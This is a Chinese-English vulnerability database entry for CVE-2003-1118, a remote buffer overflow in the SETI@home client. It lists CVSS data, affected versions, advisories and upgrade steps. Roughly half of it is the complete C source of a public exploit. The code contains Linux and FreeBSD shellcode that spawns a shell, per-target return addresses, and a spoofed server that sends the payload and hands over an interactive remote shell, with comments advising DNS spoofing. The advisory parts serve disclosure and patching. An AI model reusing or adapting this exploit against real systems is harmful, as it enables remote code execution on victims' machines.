CVE-2003-1118
CVSS7.5
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:05
NMCOES    

[原文]Buffer overflow in the SETI@home client 3.03 and other versions allows remote attackers to cause a denial of service (client crash) and execute arbitrary code via a spoofed server response containing a long string followed by a \n (newline) character.


[CNNVD]SETI @ home的客户端程序远程缓冲区溢出漏洞(CNNVD-200312-067)

        SETI@home客户端3.03以及其他版本存在缓冲区溢出漏洞。远程攻击者借助包含以\n(换行)字符结尾的超长字符串的欺骗服务器响应导致服务拒绝(客户端程序崩溃)并执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:university_of_california:seti_at_home:3.4
cpe:/a:university_of_california:seti_at_home:3.7
cpe:/a:university_of_california:seti_at_home:3.3
cpe:/a:university_of_california:seti_at_home:3.5
cpe:/a:university_of_california:seti_at_home:3.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1118
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1118
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-067
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/146785
(VENDOR_ADVISORY)  CERT-VN  VU#146785
http://www.securityfocus.com/bid/7292
(PATCH)  BID  7292
http://xforce.iss.net/xforce/xfdb/11731
(UNKNOWN)  XF  seti@home-newline-bo(11731)
http://lists.grok.org.uk/pipermail/full-disclosure/2003-April/004383.html
(UNKNOWN)  FULLDISC  20030406 Seti@home information leakage and remote compromise

- 漏洞信息

SETI @ home的客户端程序远程缓冲区溢出漏洞
高危 缓冲区溢出
2003-12-31 00:00:00 2006-08-24 00:00:00
远程  
        SETI@home客户端3.03以及其他版本存在缓冲区溢出漏洞。远程攻击者借助包含以\n(换行)字符结尾的超长字符串的欺骗服务器响应导致服务拒绝(客户端程序崩溃)并执行任意代码。

- 公告与补丁

        FreeBSD have released an advisory (FreeBSD-SN-03:02) to address this issue.
        The vendor has addressed this issue in version 3.08. Users are advised to upgrade their clients as soon as possible.
        Gentoo Linux has released an advisory. Users who have installed app-sci/setiathome are advised to upgrade to setiathome-3.08 by issuing the following commands:
        emerge sync
        emerge setiathome
        emerge clean
        Fix:
        SETI SETI@home 3.3
        
        SETI SETI@home 3.4
        
        SETI SETI@home 3.5
        
        SETI SETI@home 3.6
        
        SETI SETI@home 3.7
        

- 漏洞信息 (8)

SETI@home Clients Buffer Overflow Exploit (EDBID:8)
linux remote
2003-04-08 Verified
0 zillion
N/A [点击下载]
/*
   Seti@Home exploit by zillion[at]safemode.org (2003/01/07)

   Credits for the vulnerability go to: SkyLined <SkyLined@edup.tudelft.nl>
   http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Seti@home

   Use this exploit in combination with a DNS spoofing utility such as the one
   provided in the Dsniff package. http://naughty.monkey.org/~dugsong/dsniff/

*/

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <stdio.h>

#define NOP 0x41
#define EXEC "TERM=xterm; export TERM=xterm;exec /bin/sh -i"
#define EXEC2 "id;uname -a;"

char linux_shellcode[] =

   /* dup */
   "\x31\xc9\x31\xc0\x31\xdb\xb3\x04\xb0\x3f\xcd\x80\xfe\xc1\xb0"
   "\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"


   /* execve /bin/sh */
   "\x31\xdb\x31\xc9\xf7\xe3\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
   "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


char freebsd_shellcode[] =

  "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb1\x03\xbb\xff\xff\xff\xff"
  "\xb2\x04\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3"

  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
  "\xb0\x3b\x50\xcd\x80";

char static_crap[] =

   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

struct target
{
  int   num;
  char *description;
  char *versions;
  char *type;
  char *shellcode;
  long  retaddress;
  int   bufsize;
  int   offset;
  int   junk;
};

struct target targets[] =
{
  {0,  "Linux  2.2.* ", "3.03.i386      linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
   0xbffff420, 520, 500, 0},
  {1,  "Linux  2.4.* ", "3.03 i386/i686 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
   0xbffff390, 520, 500, 1},
  {2,  "Linux  2.*   ", "3.03.i386/i686 linux-gnulibc1-static", "Packet retr mode", linux_shellcode,
  0xbffff448, 520, 500, 1},
  {3,  "All above    ", "3.03.i386      linux*               ", "Packet retr mode", linux_shellcode,
   0xbffff448, 520, 300, 1},
  {4,  "FreeBSD      ", "3.03.i386      FreeBSD-2.2.8        ", "Packet retr mode", freebsd_shellcode,
 0x0004956c, 520, 1, 2},
  {5, NULL, NULL, NULL, NULL, 0, 0, 0}
};

int open_socket(int port)
{

  int sock,fd;
  struct sockaddr_in cliAddr, servAddr;

  sock = socket(AF_INET, SOCK_STREAM, 0);
   if(sock<0) {
    printf("Error: Cannot open socket \n");
    exit(1);
  }

  /* bind server port */
  servAddr.sin_family = AF_INET;
  servAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  servAddr.sin_port = htons(port);

  if(bind(sock, (struct sockaddr *) &servAddr, sizeof(servAddr))<0) {
    printf("Error: Cannot bind to port %d \n",port);
    exit(1);
  }

  listen(sock,5);
  fd=accept(sock,0,0);

  return fd;
}

void usage(char *progname) {

  int i;

  printf("\n---------------------------------------------------");
  printf("\n  *- Seti@Home remote exploit by zillion (s-m0de) -*");
  printf("\n---------------------------------------------------");
  printf("\n\nDefault      : %s  -h <target host>",progname);
  printf("\nTarget       : %s  -t <number>",progname);
  printf("\nOffset       : %s  -o <offset>",progname);
  printf("\nPort         : %s  -p <port>\n",progname);
  printf("\nDebug        : %s  -d \n",progname);

  printf("\nAvailable types:\n");
  printf("---------------------------------------------------\n");
  for(i = 0; targets[i].description; i++) {
    fprintf(stdout, "%d\t%s\t%s\t%s\n", targets[i].num, targets[i].description,targets[i].
versions,targets[i].type);
  }
  printf("\n\n");
  exit(0);
}

int sh(int sockfd) {
  char snd[1024], rcv[1024];
  fd_set rset;
  int maxfd, n,test;

  strcpy(snd, EXEC "\n");
  write(sockfd, snd, strlen(snd));

  read(sockfd,rcv,7);
  fflush(stdout);

  strcpy(snd, EXEC2 "\n");
  write(sockfd, snd, strlen(snd));

  /* Main command loop */
  for (;;) {
    FD_SET(fileno(stdin), &rset);
    FD_SET(sockfd, &rset);

    maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
    select(maxfd, &rset, NULL, NULL, NULL);

    if (FD_ISSET(fileno(stdin), &rset)) {
      bzero(snd, sizeof(snd));
      fgets(snd, sizeof(snd)-2, stdin);
      write(sockfd, snd, strlen(snd));
    }

    if (FD_ISSET(sockfd, &rset)) {
      bzero(rcv, sizeof(rcv));

      if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
	/* exit */
	return 0;
      }

      if (n < 0) {
	perror("read");
	return 1;
      }

      fputs(rcv, stdout);
      fflush(stdout);
    }
  } /* for(;;) */
}


int main(int argc, char **argv){

  char *buffer,*tmp;
  long retaddress;
  char rcv[200];
  int fd,i,arg,debug=0,type=0,port=80,offset=250;

  if(argc < 2) { usage(argv[0]); }

  while ((arg = getopt (argc, argv, "dh:o:l:p:t:")) != -1){
    switch (arg){
    case 'd':
	debug = 1;
	break;
    case 'o':
      offset = atoi(optarg);
      break;
    case 'p':
      port = atoi(optarg);
      break;
    case 't':
      type = atoi(optarg);
      break;
    default :
      usage(argv[0]);
    }
  }

  if((targets[type].retaddress) != 0) {
    buffer = (char *)malloc((targets[type].bufsize));

    /* some junk may be required to counter buffer manipulation */

    if(targets[type].junk == 1) {

    tmp = (char *)malloc(strlen(static_crap) + strlen(targets[type].shellcode));

    strcpy(tmp,targets[type].shellcode);
    strcat(tmp,static_crap);

    targets[type].shellcode = tmp;

    }

    memset(buffer,NOP,targets[type].bufsize);
    memcpy(buffer + (targets[type].bufsize) - (strlen(targets[type].shellcode) + 8) ,targets[type].
shellcode,strlen(targets[type].shellcode));

    /* Overwrite EBP and EIP */
    *(long *)&buffer[(targets[type].bufsize) - 8]  = (targets[type].retaddress - targets[type].offset);


    // If freebsd we need to place a value without 00 in ebp

    if(type == 4) {
       *(long *)&buffer[(targets[type].bufsize) - 8]  = 0xbfbff654;
    }

    *(long *)&buffer[(targets[type].bufsize) - 4]  = (targets[type].retaddress - targets[type].offset);

    /* Uncomment to overwrite eip and ebp with 41414141 */
    if(debug == 1) {
    *(long *)&buffer[(targets[type].bufsize) - 8]  = 0x41414141;
    *(long *)&buffer[(targets[type].bufsize) - 4]  = 0x41414141;
    }
  }

  fd = open_socket(port);

  write(fd,buffer,strlen(buffer));
  write(fd,"\n",1);
  write(fd,"\n",1);

  sleep(1);
  sh(fd);

  close(fd);
  return 0;

}


// milw0rm.com [2003-04-08]
		

- 漏洞信息

16017
SETI@home Client Server Response String Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-04-06 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SETI@home Client Program Remote Buffer Overflow Vulnerability
Boundary Condition Error 7292
Yes No
2003-04-06 12:00:00 2009-07-11 09:06:00
The discovery of this vulnerability has been credited to "Berend-Jan Wever" <SkyLined@edup.tudelft.nl>.

- 受影响的程序版本

SETI SETI@home 3.7
SETI SETI@home 3.6
SETI SETI@home 3.5
SETI SETI@home 3.4
SETI SETI@home 3.3
SETI SETI@home 3.8

- 不受影响的程序版本

SETI SETI@home 3.8

- 漏洞讨论

A vulnerability has been discovered in the SETI@home client program. Due to insufficient bounds checking when processing server data, it may be possible for a remote attacker to trigger a buffer overflow.

Successful exploitation of this issue may allow an attacker to execute arbitrary commands on a target system, with the privileges of the user invoking the application.

This vulnerability affects SETI@home releases prior to 3.08.

- 漏洞利用

It has been reported that an exploit is publicly available.

- 解决方案

FreeBSD have released an advisory (FreeBSD-SN-03:02) to address this issue.

The vendor has addressed this issue in version 3.08. Users are advised to upgrade their clients as soon as possible.

Gentoo Linux has released an advisory. Users who have installed app-sci/setiathome are advised to upgrade to setiathome-3.08 by issuing the following commands:

emerge sync
emerge setiathome
emerge clean

Fix:


SETI SETI@home 3.3

SETI SETI@home 3.4

SETI SETI@home 3.5

SETI SETI@home 3.6

SETI SETI@home 3.7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站